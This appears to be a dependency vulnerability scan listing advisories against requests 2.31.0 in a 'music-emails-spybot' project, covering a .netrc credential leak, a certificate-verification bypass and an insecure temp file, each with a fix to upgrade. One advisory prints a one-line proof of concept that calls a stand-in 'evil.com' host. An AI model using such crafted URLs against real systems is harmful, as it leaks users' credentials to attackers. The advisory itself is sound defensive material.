Find, fix and prevent vulnerabilities in your code.
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.31.0
Detailed paths
-
Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 › requests@2.31.0Remediation: Upgrade to requests@2.32.4.
Overview
Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.
Note:
This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).
PoC
requests.get('http://example.com:@evil.com/')
Remediation
Upgrade requests to version 2.32.4 or higher.
References
medium severity
- Vulnerable module: requests
- Introduced through: requests@2.31.0
Detailed paths
-
Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 › requests@2.31.0Remediation: Upgrade to requests@2.32.2.
Overview
Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.
Notes:
For requests <2.32.0, avoid setting
verify=Falsefor the first request to a host while using a Requests Session.For requests <2.32.0, call
close()on Session objects to clear existing connections ifverify=Falseis used.This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.
Remediation
Upgrade requests to version 2.32.2 or higher.
References
medium severity
new
- Vulnerable module: requests
- Introduced through: requests@2.31.0
Detailed paths
-
Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 › requests@2.31.0Remediation: Upgrade to requests@2.33.0.
Overview
Affected versions of this package are vulnerable to Insecure Temporary File via the extract_zipped_paths function. An attacker can leverage unauthorized file replacement by pre-creating a malicious file in the system's temporary directory prior to extraction.
Note: Only applications that call extract_zipped_paths() directly are impacted.
Workaround
This vulnerability can be mitigated by setting the TMPDIR environment variable to a directory with restricted write access.
Remediation
Upgrade requests to version 2.33.0 or higher.
References
medium severity
- Module: certifi
- Introduced through: requests@2.31.0
Detailed paths
-
Introduced through: lucas-c/music-emails-spybot@lucas-c/music-emails-spybot#879023125d465d93fb3bd3119dfa0d0c97806036 › requests@2.31.0 › certifi@2026.2.25
MPL-2.0 license